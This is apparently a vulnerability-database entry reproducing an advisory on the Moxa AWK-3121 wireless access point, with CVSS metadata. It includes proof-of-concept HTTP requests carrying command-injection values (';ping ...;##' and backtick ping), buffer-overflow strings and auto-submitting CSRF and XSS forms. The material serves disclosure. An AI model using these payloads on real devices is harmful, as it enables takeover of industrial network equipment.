[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0787",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10697"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10697",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-10697",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-120482",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10697",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10697",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-325",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120482",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10697",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"srvName\" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n 